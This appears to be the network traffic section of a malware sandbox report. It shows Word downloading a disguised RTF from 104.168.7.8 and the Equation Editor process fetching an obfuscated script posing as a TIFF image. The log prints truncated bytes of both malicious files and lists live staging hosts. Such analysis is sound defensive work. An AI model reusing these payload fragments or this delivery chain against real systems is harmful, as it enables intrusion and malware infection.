Oct 1, 2024 09:25:26.467282057 CEST | 192.168.2.22 | 8.8.8.8 | 0xbbe7 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:34.116450071 CEST | 192.168.2.22 | 8.8.8.8 | 0xec4d | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 1, 2024 09:25:06.127619982 CEST | 8.8.8.8 | 192.168.2.22 | 0xa057 | No error (0) | og1.in | | 172.67.216.244 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:06.127619982 CEST | 8.8.8.8 | 192.168.2.22 | 0xa057 | No error (0) | og1.in | | 104.21.78.54 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:07.910640955 CEST | 8.8.8.8 | 192.168.2.22 | 0x363e | No error (0) | og1.in | | 172.67.216.244 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:07.910640955 CEST | 8.8.8.8 | 192.168.2.22 | 0x363e | No error (0) | og1.in | | 104.21.78.54 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:07.919339895 CEST | 8.8.8.8 | 192.168.2.22 | 0x4496 | No error (0) | og1.in | | 104.21.78.54 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:07.919339895 CEST | 8.8.8.8 | 192.168.2.22 | 0x4496 | No error (0) | og1.in | | 172.67.216.244 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:12.454793930 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | og1.in | | 172.67.216.244 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:12.454793930 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | og1.in | | 104.21.78.54 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:12.467856884 CEST | 8.8.8.8 | 192.168.2.22 | 0x2664 | No error (0) | og1.in | | 172.67.216.244 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:12.467856884 CEST | 8.8.8.8 | 192.168.2.22 | 0x2664 | No error (0) | og1.in | | 104.21.78.54 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:14.109524012 CEST | 8.8.8.8 | 192.168.2.22 | 0xb6ec | No error (0) | og1.in | | 104.21.78.54 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:14.109524012 CEST | 8.8.8.8 | 192.168.2.22 | 0xb6ec | No error (0) | og1.in | | 172.67.216.244 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:14.122888088 CEST | 8.8.8.8 | 192.168.2.22 | 0xd97e | No error (0) | og1.in | | 104.21.78.54 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:14.122888088 CEST | 8.8.8.8 | 192.168.2.22 | 0xd97e | No error (0) | og1.in | | 172.67.216.244 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:26.474102974 CEST | 8.8.8.8 | 192.168.2.22 | 0xbbe7 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:26.474102974 CEST | 8.8.8.8 | 192.168.2.22 | 0xbbe7 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:26.474102974 CEST | 8.8.8.8 | 192.168.2.22 | 0xbbe7 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:26.474102974 CEST | 8.8.8.8 | 192.168.2.22 | 0xbbe7 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:34.125931978 CEST | 8.8.8.8 | 192.168.2.22 | 0xec4d | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
• og1.in
• raw.githubusercontent.com
• 104.168.7.8
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49167 | 104.168.7.8 | 80 | 3348 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 09:25:18.646023035 CEST | 483 | OUT | GET /510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doc HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 104.168.7.8
Connection: Keep-Alive
Oct 1, 2024 09:25:20.090205908 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 01 Oct 2024 07:25:19 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Tue, 01 Oct 2024 00:22:14 GMT
ETag: "10e7f-6235f5034649d"
Accept-Ranges: bytes
Content-Length: 69247
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/msword
Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 0d 0d 09 09 09 09 09 09 09 09 09 09 7b 5c 2a 5c 6c 69 6e 65 46 69 6c 6c 48 65 69 67 68 74 36 33 32 36 39 39 39 36 31 20 5c 3b 7d 0d 7b 5c 35 34 39 36 36 34 38 35 30 3f 37 a7 36 5f 3f 60 33 30 38 34 25 5f 34 36 5d 2a 3f 35 32 5b 3b 3f 40 3f 3d 2b 21 5e 25 3f 5b 3f a7 3f a7 31 5e 3c 5d 2a 26 31 3f 5f 25 38 3f 3b 26 3f 2e 3a 5e 28 39 24 5f 60 27 25 3f 40 5e 60 3f 34 5e 26 5b b0 31 34 7e 39 b0 3f 2d 23 3b 27 24 2c 2f 3d 37 21 40 27 5b 5b a7 33 30 2d 32 7c 38 2e 3a 3f 29 3f 25 3d 5b 5e 38 40 7c 27 3c 5e 2b 33 36 a7 3a 5d b5 7c 3b 38 a7 b0 5e 2b 5b 2a 3f 3f 2f 33 b0 25 37 2d 36 2c 25 36 2e 5f 2e 3f 3f 3d 28 60 2e 23 24 33 2d 3c 25 7e 38 7c b0 3a 3f 7c 26 29 a7 b5 2e 3f 38 34 b5 40 35 7c 3f 3b 2a 27 28 5f 40 b5 3a 5b 3a 3b 2f 21 2b 31 3e 28 2b 25 2f 3d 31 3a 2f 2c 24 34 2e 3f 2d 24 7c 26 35 33 25 7c 3f 40 32 3f 29 31 21 33 b0 b5 29 40 27 b5 5d 3f 2f b5 29 5b 7c 2f 21 25 25 29 23 23 26 2d 3b 60 27 3f 34 3f 5d a7 2d 2d 39 5f 3d b5 21 26 25 a7 2e 7e 3e 2c 2a 3f 26 37 27 2c 23 2c [TRUNCATED]
Data Ascii: {\rtf1{\*\lineFillHeight632699961 \;}{\549664850?76_?`3084%_46]*?52[;?@?=+!^%?[??1^<]*&1?_%8?;&?.:^(9$_`'%?@^`?4^&[14~9?-#;'$,/=7!@'[[30-2|8.:?)?%=[^8@|'<^+36:]|;8^+[*??/3%7-6,%6._.??=(`.#$3-<%~8|:?|&).?84@5|?;*'(_@:[:;/!+1>(+%/=1:/,$4.?-$|&53%|?@2?)1!3)@']?/)[|/!%%)##&-;`'?4?]--9_=!&%.~>,*?&7',#,.?|$!'!,.`_*=8_36_:%#?6%>!`^3/`?*1@.&?8)`36:+[;#?7`%.;$0&!?@--%6@<((`<[+>*?;0+7_?7]]`?%:;?[+(,$%11<?`3%=^7?_@'=[??<=@)=??4/97?78]!2#%?]=&|8??&[*]7|%?^??%]!?_-#>%%5?>|@=?3`3>58/?(8,2=?@|,.&?_?%;4?4?@--?3&(..8''5,~>~%-==/64|4&%|3_.~~|@633)?^8!767_&<%*>7@!/_;-9@|?[#0!#:(31@-|#!/^2/8|1?3/8???8!@~?1$?(7,?61$3)<~)9;2>+41!+0:40?>?(?(5:6:_~&,#&)+($?3@?!9'&?3]??<'@!?418*;'=!=9?.!?#<.2*&|?[0#+)11%-[9:&|88<^>83?843)8&%/,[??<?1?('?/&4=0_%0*<+,]*)==]3?|`_`:|+*2`]2.&!332!!-%;,!?=%6#(??9/:*&)<_#^|97*?+@?#?|))?0:*6<:@0;|^?/8)?9&~:0(=6=,?[4&/&1'`6$>
Oct 1, 2024 09:25:20.090223074 CEST | 224 | IN | Data Raw: 3f 2d 37 5f 3f 3f 2b 25 40 35 5b 26 40 60 5d 3c 3f 2e 26 2a 7e 3f 3f 3b 5d 2a 3c 3f 7e 31 39 3f 39 5b 37 21 37 21 39 36 3b b0 23 3c 3e 29 23 25 27 5b 3b 5e 3e 3f 21 34 3f 3e 2e 36 3f 2d 40 40 3c 3e 36 3f 2b 3f 40 2c 60 3c 2a 3a 3c 36 31 3f 32 34
Data Ascii: ?-7_??+%@5[&@`]<?.&*~??;]*<?~19?9[7!7!96;#<>)#%'[;^>?!4?>.6?-@@<>6?+?@,`<*:<61?24/]5???)0`&!4[2[9%4~?0&,*?&~>_?(83660?/1?]-!`(?>?1<,)/'?#?3:^,'_?[2*2?-1.)]~];%!~]9+2`@`?[786,~`=252%8:)`~<]]2#6*;=)|.[;>7$_!~&=69]$>|%
Oct 1, 2024 09:25:20.090238094 CEST | 1236 | IN | Data Raw: 33 31 36 25 25 37 3c 3f 5f 3c 26 3f 40 27 34 7c 25 25 b0 3d 29 3f 21 40 30 a7 7c 5d 3f 35 7e 26 5d 3f 3f 3c 5b 38 5f 26 5b 35 35 37 5f 24 21 3f 3e 7e 24 39 2e 7e 32 33 30 33 5b 37 7c b0 32 5f 37 3e 2c 28 3f 3e 3c 5d 3a 2d 39 24 a7 21 2b 25 3f 25
Data Ascii: 316%%7<?_<&?@'4|%%=)?!@0|]?5~&]??<[8_&[557_$!?>~$9.~2303[7|2_7>,(?><]:-9$!+%?%~2_0>23,?,(??1+'.981/'7'`+)(#362?83/+?2!<=.653|?)9~?/(^#|/-`+?(`$3$^`'982,&|27/9-@/4?0-5.`1&-%[%@.%`'04`9$_3!1|.`-|5<[6|'9_`?]?.?$.51->_%8&<-5?/_?-_$
Oct 1, 2024 09:25:20.090300083 CEST | 1236 | IN | Data Raw: 7c b5 40 36 28 2a 31 7c 37 23 2f 31 a7 30 3d 40 7c 5e 40 38 3f 25 32 3f 34 25 b0 23 35 3f 2f 28 5d 37 2c 23 29 2b 60 2d 35 31 2d 3f 31 3f 23 3c 27 26 39 7e 36 31 21 38 2b 3f 5b 33 5b 35 25 3f 3a a7 3f 3e 5e 3f 31 24 3f 34 7c 35 7c 3f 40 7e 37 5d
Data Ascii: |@6(*1|7#/10=@|^@8?%2?4%#5?/(]7,#)+`-51-?1?#<'&9~61!8+?[3[5%?:?>^?1$?4|5|?@~7]?#)#?&??|0?)?#~?~^?=@/0#8+&?_15>3!8%`?[4?-?%%4#@&%`(9)'88[0:!^?5'=3+)^&3#?1%%5248%0`&?8*??!;1)68-@)?]&?>?67<?;@8>1-%:?0=2:.['6/+:#%?4@?[<$2?`@=-]4;^&77?+
Oct 1, 2024 09:25:20.090310097 CEST | 1236 | IN | Data Raw: 2f 2b 3f 2e b0 32 34 3c 5e 30 5e 2c 3d 26 2c b0 3f 3f 60 36 26 2c 26 36 a7 33 2e 3c 40 23 a7 60 2e 3f 3f 3f 26 2a 34 b0 3f 2c 36 2b 3b 2c 24 3f 24 3f 23 5e 3f 39 b0 25 26 21 2e 3f 26 40 3f 34 3f 28 27 3d 7c 39 b5 5f 3c 39 3e 5f 5e 5f 2d 40 3d 2b
Data Ascii: /+?.24<^0^,=&,??`6&,&63.<@#`.???&*4?,6+;,$?$?#^?9%&!.?&@?4?('=|9_<9>_^_-@=+<,![?5#=*3<('6_%4??[//=#.)!]1%?017#72[~=*5!9<:?[+??#+_#&1$6@&4<3<?;*?$?.^`&$<@'=~#0,9_6[!?+*;|%_+?'^33|[5>,7??5?11+(?/0@85!*4?@'.8%.?%-=<=(5),*>]>0[:*%2
Oct 1, 2024 09:25:20.090320110 CEST | 1236 | IN | Data Raw: 2f 7c 21 29 3a 3f b5 3b 3b 60 29 2c 37 7c 7c 25 2f 24 5e 33 21 27 35 b5 25 2f 7e 26 23 28 b5 2e 37 3a 39 3f b0 34 7c 23 2c 3a 2f 2e 5d 5e 3e 3a 3f 31 26 3f b5 2a 60 5d 5e 27 33 a7 2b 31 24 3d 35 27 3c 5d 3e 38 5e 3c 28 25 25 3d 32 60 24 21 26 29
Data Ascii: /|!):?;;`),7||%/$^3!'5%/~&#(.7:9?4|#,:/.]^>:?1&?*`]^'3+1$=5'<]>8^<(%%=2`$!&)+?%5>?5%*/?&?~13[??9/`?;9?;`;?=.~)#%?8;?-10$>@(:**?>0)(:1_?)%.='?('8_4%_`*4~?>#.<0^;0*.2~&_:0)#8*?]/=#$%''/0?((;?)3%$8!(>>]83=85(?7?#)'<##`?,%<@+%<&15##;[%
Oct 1, 2024 09:25:20.090326071 CEST | 1236 | IN | Data Raw: 40 3f 3b 31 3f 2d 27 32 3b 2f 3a 32 29 26 2a 3a 39 a7 24 2a 7c 39 2f 39 25 26 2c 7c 25 a7 38 38 32 3d 7e 35 34 39 33 2d 38 7e 3f 35 3f 2c 35 40 5b 29 7c 5b 5d 25 7c b5 23 37 5b 3f 33 3e 3e 37 24 3f b0 3f 3f 2e b5 28 25 34 3a 5b 3c 39 60 30 2c a7
Data Ascii: @?;1?-'2;/:2)&*:9$*|9/9%&,|%882=~5493-8~?5?,5@[)|[]%|#7[?3>>7$???.(%4:[<9`0,:.$7]]~?61|38%:@+9~>^1'%;=4$%<*.^&<3_?`-!-;24]0?`~63?9-1?.%?|)%<:-2%(&0~@_<?|5/&7^+=8%03@%,3_=@9+%-]?,%1:/3<9#8-?::+$@_9<~?.`03?%?((|`!_]&^:[8(@89[
Oct 1, 2024 09:25:20.090429068 CEST | 1236 | IN | Data Raw: 32 39 31 39 36 35 39 38 36 38 32 37 37 30 34 33 30 30 36 39 31 36 74 63 70 68 71 69 71 65 64 74 7a 70 70 69 6e 70 69 68 6a 64 73 70 6a 6a 6d 79 6c 63 71 71 6a 56 57 4d 57 5a 44 53 4a 44 41 4e 46 4b 43 54 43 5a 57 59 48 49 46 45 38 35 32 30 33 36
Data Ascii: 2919659868277043006916tcphqiqedtzppinpihjdspjjmylcqqjVWMWZDSJDANFKCTCZWYHIFE85203657026617}}f41e2 \bin063 b020000
Oct 1, 2024 09:25:20.090445995 CEST | 1236 | IN | Data Raw: 20 20 09 20 20 20 20 09 09 09 09 09 09 09 20 09 20 09 20 20 20 20 09 20 20 20 09 20 09 09 09 20 09 09 20 30 63 63 09 09 09 09 20 20 09 20 09 20 09 20 20 09 09 20 20 20 20 09 09 09 20 09 09 20 20 20 20 09 20 20 09 20 20 20 20 09 09 09 09 09 09 09
Data Ascii: 0cc 05 00 0
Oct 1, 2024 09:25:20.090455055 CEST | 1236 | IN | Data Raw: 20 20 09 20 09 09 20 20 20 20 20 09 09 20 20 20 09 20 09 09 09 09 20 20 20 20 20 09 20 20 20 20 09 09 09 09 09 20 09 20 20 09 20 09 20 09 20 09 09 20 09 09 20 37 31 09 20 09 09 09 20 09 20 20 20 09 20 09 20 09 09 20 09 20 09 20 09 09 09 09 09 20
Data Ascii: 71 77 e58
Oct 1, 2024 09:25:20.090465069 CEST | 1236 | IN | Data Raw: 09 20 09 20 09 09 20 09 09 20 66 09 09 20 20 09 09 20 20 20 20 20 20 20 09 09 09 09 09 20 09 09 09 09 09 09 20 20 20 20 20 20 09 09 20 09 09 09 09 20 20 20 09 20 09 09 20 20 09 09 20 09 20 09 09 09 20 20 20 20 09 09 20 09 09 20 61 64 65 20 09 09
Data Ascii: f ade aed 6
Oct 1, 2024 09:25:20.090660095 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 01 Oct 2024 07:25:19 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Tue, 01 Oct 2024 00:22:14 GMT
ETag: "10e7f-6235f5034649d"
Accept-Ranges: bytes
Content-Length: 69247
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/msword
Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 0d 0d 09 09 09 09 09 09 09 09 09 09 7b 5c 2a 5c 6c 69 6e 65 46 69 6c 6c 48 65 69 67 68 74 36 33 32 36 39 39 39 36 31 20 5c 3b 7d 0d 7b 5c 35 34 39 36 36 34 38 35 30 3f 37 a7 36 5f 3f 60 33 30 38 34 25 5f 34 36 5d 2a 3f 35 32 5b 3b 3f 40 3f 3d 2b 21 5e 25 3f 5b 3f a7 3f a7 31 5e 3c 5d 2a 26 31 3f 5f 25 38 3f 3b 26 3f 2e 3a 5e 28 39 24 5f 60 27 25 3f 40 5e 60 3f 34 5e 26 5b b0 31 34 7e 39 b0 3f 2d 23 3b 27 24 2c 2f 3d 37 21 40 27 5b 5b a7 33 30 2d 32 7c 38 2e 3a 3f 29 3f 25 3d 5b 5e 38 40 7c 27 3c 5e 2b 33 36 a7 3a 5d b5 7c 3b 38 a7 b0 5e 2b 5b 2a 3f 3f 2f 33 b0 25 37 2d 36 2c 25 36 2e 5f 2e 3f 3f 3d 28 60 2e 23 24 33 2d 3c 25 7e 38 7c b0 3a 3f 7c 26 29 a7 b5 2e 3f 38 34 b5 40 35 7c 3f 3b 2a 27 28 5f 40 b5 3a 5b 3a 3b 2f 21 2b 31 3e 28 2b 25 2f 3d 31 3a 2f 2c 24 34 2e 3f 2d 24 7c 26 35 33 25 7c 3f 40 32 3f 29 31 21 33 b0 b5 29 40 27 b5 5d 3f 2f b5 29 5b 7c 2f 21 25 25 29 23 23 26 2d 3b 60 27 3f 34 3f 5d a7 2d 2d 39 5f 3d b5 21 26 25 a7 2e 7e 3e 2c 2a 3f 26 37 27 2c 23 2c [TRUNCATED]
Data Ascii: {\rtf1{\*\lineFillHeight632699961 \;}{\549664850?76_?`3084%_46]*?52[;?@?=+!^%?[??1^<]*&1?_%8?;&?.:^(9$_`'%?@^`?4^&[14~9?-#;'$,/=7!@'[[30-2|8.:?)?%=[^8@|'<^+36:]|;8^+[*??/3%7-6,%6._.??=(`.#$3-<%~8|:?|&).?84@5|?;*'(_@:[:;/!+1>(+%/=1:/,$4.?-$|&53%|?@2?)1!3)@']?/)[|/!%%)##&-;`'?4?]--9_=!&%.~>,*?&7',#,.?|$!'!,.`_*=8_36_:%#?6%>!`^3/`?*1@.&?8)`36:+[;#?7`%.;$0&!?@--%6@<((`<[+>*?;0+7_?7]]`?%:;?[+(,$%11<?`3%=^7?_@'=[??<=@)=??4/97?78]!2#%?]=&|8??&[*]7|%?^??%]!?_-#>%%5?>|@=?3`3>58/?(8,2=?@|,.&?_?%;4?4?@--?3&(..8''5,~>~%-==/64|4&%|3_.~~|@633)?^8!767_&<%*>7@!/_;-9@|?[#0!#:(31@-|#!/^2/8|1?3/8???8!@~?1$?(7,?61$3)<~)9;2>+41!+0:40?>?(?(5:6:_~&,#&)+($?3@?!9'&?3]??<'@!?418*;'=!=9?.!?#<.2*&|?[0#+)11%-[9:&|88<^>83?843)8&%/,[??<?1?('?/&4=0_%0*<+,]*)==]3?|`_`:|+*2`]2.&!332!!-%;,!?=%6#(??9/:*&)<_#^|97*?+@?#?|))?0:*6<:@0;|^?/8)?9&~:0(=6=,?[4&/&1'`6$>
Oct 1, 2024 09:25:20.090948105 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 01 Oct 2024 07:25:19 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Tue, 01 Oct 2024 00:22:14 GMT
ETag: "10e7f-6235f5034649d"
Accept-Ranges: bytes
Content-Length: 69247
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/msword
Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 0d 0d 09 09 09 09 09 09 09 09 09 09 7b 5c 2a 5c 6c 69 6e 65 46 69 6c 6c 48 65 69 67 68 74 36 33 32 36 39 39 39 36 31 20 5c 3b 7d 0d 7b 5c 35 34 39 36 36 34 38 35 30 3f 37 a7 36 5f 3f 60 33 30 38 34 25 5f 34 36 5d 2a 3f 35 32 5b 3b 3f 40 3f 3d 2b 21 5e 25 3f 5b 3f a7 3f a7 31 5e 3c 5d 2a 26 31 3f 5f 25 38 3f 3b 26 3f 2e 3a 5e 28 39 24 5f 60 27 25 3f 40 5e 60 3f 34 5e 26 5b b0 31 34 7e 39 b0 3f 2d 23 3b 27 24 2c 2f 3d 37 21 40 27 5b 5b a7 33 30 2d 32 7c 38 2e 3a 3f 29 3f 25 3d 5b 5e 38 40 7c 27 3c 5e 2b 33 36 a7 3a 5d b5 7c 3b 38 a7 b0 5e 2b 5b 2a 3f 3f 2f 33 b0 25 37 2d 36 2c 25 36 2e 5f 2e 3f 3f 3d 28 60 2e 23 24 33 2d 3c 25 7e 38 7c b0 3a 3f 7c 26 29 a7 b5 2e 3f 38 34 b5 40 35 7c 3f 3b 2a 27 28 5f 40 b5 3a 5b 3a 3b 2f 21 2b 31 3e 28 2b 25 2f 3d 31 3a 2f 2c 24 34 2e 3f 2d 24 7c 26 35 33 25 7c 3f 40 32 3f 29 31 21 33 b0 b5 29 40 27 b5 5d 3f 2f b5 29 5b 7c 2f 21 25 25 29 23 23 26 2d 3b 60 27 3f 34 3f 5d a7 2d 2d 39 5f 3d b5 21 26 25 a7 2e 7e 3e 2c 2a 3f 26 37 27 2c 23 2c [TRUNCATED]
Data Ascii: {\rtf1{\*\lineFillHeight632699961 \;}{\549664850?76_?`3084%_46]*?52[;?@?=+!^%?[??1^<]*&1?_%8?;&?.:^(9$_`'%?@^`?4^&[14~9?-#;'$,/=7!@'[[30-2|8.:?)?%=[^8@|'<^+36:]|;8^+[*??/3%7-6,%6._.??=(`.#$3-<%~8|:?|&).?84@5|?;*'(_@:[:;/!+1>(+%/=1:/,$4.?-$|&53%|?@2?)1!3)@']?/)[|/!%%)##&-;`'?4?]--9_=!&%.~>,*?&7',#,.?|$!'!,.`_*=8_36_:%#?6%>!`^3/`?*1@.&?8)`36:+[;#?7`%.;$0&!?@--%6@<((`<[+>*?;0+7_?7]]`?%:;?[+(,$%11<?`3%=^7?_@'=[??<=@)=??4/97?78]!2#%?]=&|8??&[*]7|%?^??%]!?_-#>%%5?>|@=?3`3>58/?(8,2=?@|,.&?_?%;4?4?@--?3&(..8''5,~>~%-==/64|4&%|3_.~~|@633)?^8!767_&<%*>7@!/_;-9@|?[#0!#:(31@-|#!/^2/8|1?3/8???8!@~?1$?(7,?61$3)<~)9;2>+41!+0:40?>?(?(5:6:_~&,#&)+($?3@?!9'&?3]??<'@!?418*;'=!=9?.!?#<.2*&|?[0#+)11%-[9:&|88<^>83?843)8&%/,[??<?1?('?/&4=0_%0*<+,]*)==]3?|`_`:|+*2`]2.&!332!!-%;,!?=%6#(??9/:*&)<_#^|97*?+@?#?|))?0:*6<:@0;|^?/8)?9&~:0(=6=,?[4&/&1'`6$>
Oct 1, 2024 09:25:21.422795057 CEST | 272 | OUT | HEAD /510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doc HTTP/1.1
User-Agent: Microsoft Office Existence Discovery
Host: 104.168.7.8
Content-Length: 0
Connection: Keep-Alive
Oct 1, 2024 09:25:21.533859015 CEST | 321 | IN | HTTP/1.1 200 OK
Date: Tue, 01 Oct 2024 07:25:21 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Tue, 01 Oct 2024 00:22:14 GMT
ETag: "10e7f-6235f5034649d"
Accept-Ranges: bytes
Content-Length: 69247
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/msword


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49169 | 104.168.7.8 | 80 | 3800 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 09:25:21.899398088 CEST | 334 | OUT | GET /510/niceworkwithpcitureupdateson.tIF HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.168.7.8
Connection: Keep-Alive
Oct 1, 2024 09:25:22.366844893 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 01 Oct 2024 07:25:22 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Tue, 01 Oct 2024 00:17:02 GMT
ETag: "3eaa0-6235f3d910fca"
Accept-Ranges: bytes
Content-Length: 256672
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff
Data Raw: ff fe 55 00 55 00 4c 00 47 00 6d 00 63 00 52 00 6a 00 51 00 4e 00 57 00 4b 00 70 00 57 00 6d 00 6b 00 50 00 4c 00 57 00 50 00 69 00 6e 00 4c 00 57 00 68 00 6f 00 20 00 3d 00 20 00 22 00 6b 00 41 00 66 00 7a 00 4e 00 43 00 4b 00 6a 00 4b 00 47 00 6e 00 4c 00 42 00 50 00 66 00 65 00 73 00 6b 00 53 00 57 00 4c 00 4b 00 6e 00 47 00 63 00 65 00 22 00 0d 00 0a 00 41 00 4b 00 4c 00 61 00 6e 00 69 00 65 00 62 00 69 00 55 00 4c 00 4b 00 62 00 6e 00 47 00 42 00 69 00 4c 00 4b 00 72 00 75 00 6d 00 4c 00 42 00 57 00 47 00 20 00 3d 00 20 00 22 00 53 00 52 00 74 00 47 00 50 00 66 00 69 00 6b 00 75 00 6c 00 57 00 4b 00 57 00 75 00 49 00 76 00 52 00 6d 00 4e 00 48 00 68 00 43 00 43 00 70 00 6b 00 4c 00 22 00 0d 00 0a 00 48 00 47 00 4c 00 50 00 55 00 69 00 7a 00 63 00 4c 00 50 00 43 00 57 00 71 00 57 00 4c 00 78 00 6b 00 50 00 65 00 6e 00 6d 00 52 00 6a 00 4c 00 6b 00 65 00 20 00 3d 00 20 00 22 00 57 00 50 00 6d 00 63 00 4c 00 6f 00 54 00 4b 00 64 00 55 00 4e 00 62 00 4c 00 4b 00 6b 00 4c 00 4b 00 76 00 57 00 4b 00 [TRUNCATED]
Data Ascii: UULGmcRjQNWKpWmkPLWPinLWho = "kAfzNCKjKGnLBPfeskSWLKnGce"AKLaniebiULKbnGBiLKrumLBWG = "SRtGPfikulWKWuIvRmNHhCCpkL"HGLPUizcLPCWqWLxkPenmRjLke = "WPmcLoTKdUNbLKkLKvWKRNWlTp"ihdjUCoKKAeWvffGIoqKLGAGAd = "ZehNexLgikCWmWCBleRzlexchB"iWCcPWZxHWUebTphWedpeKckiK = "fPdPhWcchelRWhKGNUWWekArUK"cdKoOpkJoGWKNxZLmtWHQtWeem = "LLcpAZGmlGWZamctegLbeGKorm"ZLzpLWhGfdbmLGWPGqtdRuWLUa = "iNcczLWGeoehlzBmPWtLKLWzpL"penzUULNWPhjeHeJeGioUbefqK = "efWhzSOtOWuLWmHPR
Oct 1, 2024 09:25:22.366871119 CEST | 224 | IN | Data Raw: 00 6e 00 41 00 5a 00 68 00 65 00 57 00 55 00 50 00 61 00 22 00 0d 00 0a 00 4f 00 70 00 68 00 4b 00 70 00 69 00 5a 00 6f 00 6c 00 41 00 55 00 4c 00 66 00 71 00 69 00 4f 00 7a 00 55 00 63 00 62 00 69 00 4c 00 4b 00 57 00 6b 00 63 00 20 00 3d 00 20
Data Ascii: nAZheWUPa"OphKpiZolAULfqiOzUcbiLKWkc = "dprKkWBxocphZNkdKziKxozLGL"ldcQKpUtKTufbdKqNKKfzZmqZc = "kLWKcQoPIkn
Oct 1, 2024 09:25:22.366883039 CEST | 1236 | IN | Data Raw: 00 70 00 75 00 4e 00 6a 00 47 00 61 00 4b 00 68 00 6f 00 78 00 6f 00 42 00 4c 00 49 00 4c 00 22 00 0d 00 0a 00 0d 00 0a 00 69 00 53 00 52 00 63 00 4c 00 50 00 66 00 62 00 71 00 4c 00 6c 00 48 00 64 00 68 00 65 00 5a 00 5a 00 69 00 74 00 61 00 55
Data Ascii: puNjGaKhoxoBLIL"iSRcLPfbqLlHdheZZitaUWphAo = "dKPHWOiLLscxAIaveemTUGAiOK"RrxhOPUaGWgbWKivbnhAokUKpW = "ZiUWzepGrRWW
Oct 1, 2024 09:25:22.366889954 CEST | 1236 | IN | Data Raw: 00 72 00 47 00 47 00 47 00 47 00 4f 00 49 00 72 00 69 00 71 00 72 00 63 00 47 00 50 00 43 00 6f 00 4e 00 6b 00 61 00 69 00 57 00 57 00 68 00 63 00 6c 00 41 00 20 00 3d 00 20 00 22 00 69 00 65 00 74 00 52 00 49 00 4c 00 6f 00 6b 00 62 00 4c 00 78
Data Ascii: rGGGGOIriqrcGPCoNkaiWWhclA = "ietRILokbLxGOvKcexKmAqlNep"hUjqkKcZGPGKlbnLZilohzeUuL = "GKPiKPLZKlpSLUGaKgKWcxSLzi"WKq
